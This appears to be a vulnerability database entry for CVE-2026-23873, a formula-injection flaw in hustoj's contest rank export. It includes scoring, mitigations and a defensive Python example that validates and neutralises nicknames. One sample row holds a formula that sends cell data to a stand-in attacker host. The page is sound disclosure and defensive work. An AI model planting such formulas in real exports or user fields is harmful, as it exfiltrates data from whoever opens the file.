Cyber Resilience

CVE-2026-23873

Severity: Medium · Public PoC available

Published: 22 January 2026
Modified: 27 February 2026
KEV Added: not listed in the CISA KEV catalog
Patch: no fix available at time of publication (see the GitHub advisory below)

CVSS v4.0 base score: 5.2 (Medium)
CVSS v4.0 vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:N/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
EPSS score: 0.0051 (39.5th percentile)
Risk priority: 35 (floored blend · peak EPSS)

Summary

CVE-2026-23873 is a medium-severity Improper Neutralization of Formula Elements in a CSV File (CWE-1236) vulnerability in hustoj, the open-source online judge. Its CVSS v4.0 base score is 5.2 (Medium); a CVSS v3.1 score of 9.0 is also recorded for it, the gap reflecting that v4.0 places the whole impact on the administrator's workstation (a subsequent system) and requires active user interaction.

Operationally, exploitation maps to the MITRE ATT&CK technique User Execution: Malicious File (T1204.002). EPSS ranks it at the 39.5th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).

Deeper analysis

CVE-2026-23873 is a CSV Injection (Formula Injection) vulnerability affecting all versions of hustoj, an open-source online judge platform built on PHP, C++, MySQL and Linux and used for ACM/ICPC and NOIP training. The issue resides in the contest rank export functionality, specifically the contestrank.xls.php and admin/ranklist_export.php scripts. These components write the user-supplied "Nickname" field into the export without neutralizing it. The export is an HTML table served under an .xls file name, so Microsoft Excel opens it as a spreadsheet, and Excel treats any cell whose text begins with =, +, -, or @ as a formula rather than as literal text.

A low-privileged user, such as a registered participant, can exploit this by setting their nickname to an Excel formula. When an administrator exports the contest rank list and opens the file in Microsoft Excel, the formula is evaluated in the administrator's Excel session. Depending on the formula, this can result in arbitrary command execution on the administrator's machine or exfiltration of data from the sheet, which is why the recorded CVSS v3.1 score is 9.0 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H) under CWE-1236. One caveat for triage: Excel shows a security prompt before it follows external links or launches external commands, so the administrator has to click through it; the CVSS v4.0 vector records this as UI:A (active user interaction) with AT:P (attack requirements present), and scores the vulnerable system's own confidentiality, integrity and availability as none with all impact on the subsequent system (SC:H/SI:H/SA:H), which is why the v4.0 base score is only 5.2.

The GitHub security advisory at https://github.com/zhblue/hustoj/security/advisories/GHSA-gqwv-v7vx-2qjw details the vulnerability but notes that no fix was available at the time of publication on 2026-01-22. Until a patched release exists, practitioners should monitor for patches, restrict who can run the rank export, neutralize nicknames server-side at both input and export time, and advise administrators not to open exports in Excel, or at least not to accept Excel's external-content prompts for files produced by the judge.


Vulnerability details

hustoj is an open source online judge based on PHP/C++/MySQL/Linux for ACM/ICPC and NOIP training. All versions are vulnerable to CSV Injection (Formula Injection) through the contest rank export functionality (contestrank.xls.php and admin/ranklist_export.php). The application fails to sanitize user-supplied input (specifically the "Nickname" field) before exporting it to an .xls file (which renders as an HTML table but is opened by Excel). If a malicious user sets their nickname to an Excel formula, the formula will be executed when an administrator exports and opens the rank list in Microsoft Excel. This can lead to arbitrary command execution (RCE) on the administrator's machine or data exfiltration. A fix was not available at the time of publication.

CWE(s)

CWE-1236 Improper Neutralization of Formula Elements in a CSV File

Related Threats

MITRE ATT&CK Enterprise Techniques

T1204.002 User Execution: Malicious File
An adversary may rely upon a user opening a malicious file in order to gain execution.

Why these techniques?

A formula injected into the exported .xls runs when the administrator opens the file in Excel (T1204.002 Malicious File), giving the attacker execution on the administrator's workstation.

Confidence: MEDIUM · MITRE ATT&CK Enterprise v19.0

CVEs Like This One

CVE-2026-24479 · Same product: hustoj
CVE-2023-51333 · Shared CWE-1236
CVE-2025-50572 · Shared CWE-1236
CVE-2023-51311 · Shared CWE-1236
CVE-2025-56267 · Shared CWE-1236
CVE-2023-51319 · Shared CWE-1236
CVE-2024-45084 · Shared CWE-1236
CVE-2021-47901 · Shared CWE-1236
CVE-2023-46400 · Shared CWE-1236
CVE-2026-35157 · Shared CWE-1236

Affected Assets

Vendor: hustoj
Product: hustoj
Versions: ≤ 26.01.31

The advisory text says all versions are affected and that no fix was available at publication, so do not read the upper bound above as evidence of a fixed release without confirming it against the advisory.

Mitigating Controls (NIST 800-53 r5)

SI-15 Information Output Filtering (prevent): requires filtering and sanitization of information output in exported .xls files to prevent embedding and execution of malicious Excel formulas from unsanitized nicknames.

SI-10 Information Input Validation (prevent): mandates validation of user-supplied inputs like the Nickname field to reject or neutralize formula injection payloads before storage or processing.

Allowlist-based input restriction (prevent): enforces restrictions on input classes for fields like Nickname using allowlists to block dangerous characters that could form executable Excel formulas.
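The following Python is an added example written for this page, not hustoj's own code: it implements the output filtering (SI-15) and input validation (SI-10) controls listed above against the export mechanism described under Deeper analysis, where a nickname beginning with =, +, -, or @ becomes a formula once Excel opens the HTML-table .xls. The rank-table layout, the nickname policy regex and the sample rows are assumptions; the formula string in the sample rows is a constructed demonstration value, not a payload from the advisory. Python is used so the logic is self-contained and testable; the same rules port directly to the PHP export scripts.

```python
"""Formula-injection (CWE-1236) controls for a rank export.

Illustrative code written for this page, not hustoj's own
contestrank.xls.php / admin/ranklist_export.php. The nickname policy,
column layout and sample rows are assumptions.
"""
import html
import re

# Leading characters Excel reads as the start of a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Excel's CSS extension that forces a cell to text format on HTML import.
TEXT_STYLE = "mso-number-format:'\\@'"

# Hypothetical nickname policy (assumption): word characters, space,
# dot and hyphen, 1 to 32 characters.
NICKNAME_RE = re.compile(r"[\w .\-]{1,32}")


def is_formula_like(value: str) -> bool:
    """Would Excel evaluate this cell text instead of displaying it?

    Leading spaces are skipped before the check as a conservative choice
    (an assumption, not a documented Excel rule), so ' =1+1' is flagged
    too. Tab and CR are triggers in their own right and are kept.
    """
    stripped = value.lstrip(" ")
    return stripped != "" and stripped[0] in FORMULA_TRIGGERS


def neutralize_cell(value: str) -> str:
    """Output filtering (SI-15): prefix a formula-like cell with an
    apostrophe so Excel stores it as literal text. Other values pass
    through unchanged."""
    return "'" + value if is_formula_like(value) else value


def validate_nickname(nickname: str) -> bool:
    """Input validation (SI-10): allowlist the shape, then reject anything
    still formula-like. '-rank' matches the allowlist (hyphen is allowed)
    but is a formula trigger, which is why both checks are needed."""
    return bool(NICKNAME_RE.fullmatch(nickname)) and not is_formula_like(nickname)


def td(value: str, user_controlled: bool = False) -> str:
    """One table cell. User-controlled cells are neutralised, forced to
    text format, and HTML-escaped (the export is an HTML table, so an
    unescaped '<' would be a separate markup-injection problem)."""
    if user_controlled:
        return f'<td style="{TEXT_STYLE}">{html.escape(neutralize_cell(value))}</td>'
    return f"<td>{html.escape(value)}</td>"


def render_rank_table(rows: list) -> str:
    """Render the rank list as the HTML-table '.xls' the advisory describes."""
    out = [
        "<table>",
        "<tr><th>Rank</th><th>User</th><th>Nickname</th><th>Solved</th></tr>",
    ]
    for r in rows:
        out.append(
            "<tr>"
            + td(str(r["rank"]))
            + td(r["user_id"], user_controlled=True)
            + td(r["nickname"], user_controlled=True)
            + td(str(r["solved"]))
            + "</tr>"
        )
    out.append("</table>")
    return "\n".join(out)


# Constructed sample rows. The formula in row 2 stands in for a hostile
# nickname; it is a benign demonstration string, not an advisory payload.
SAMPLE_ROWS = [
    {"rank": 1, "user_id": "alice", "nickname": "alice_42", "solved": 7},
    {"rank": 2, "user_id": "mallory",
     "nickname": '=HYPERLINK("https://attacker.example/?"&B2,"x")', "solved": 5},
    {"rank": 3, "user_id": "bob", "nickname": "-rank", "solved": 5},
]

if __name__ == "__main__":
    for r in SAMPLE_ROWS:
        print(f'{r["nickname"]!r}: valid={validate_nickname(r["nickname"])}')
    print(render_rank_table(SAMPLE_ROWS))
```

Running it prints each sample nickname's validation verdict and the neutralised table. Rejecting at input (validate_nickname) keeps hostile values out of the database; filtering at export (td and neutralize_cell) protects rows stored before the input check existed. The apostrophe prefix is the standard neutralisation for formula-like cells, and the mso-number-format text style is a second layer in case Excel's HTML import does not honour the apostrophe.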

References

https://github.com/zhblue/hustoj/security/advisories/GHSA-gqwv-v7vx-2qjw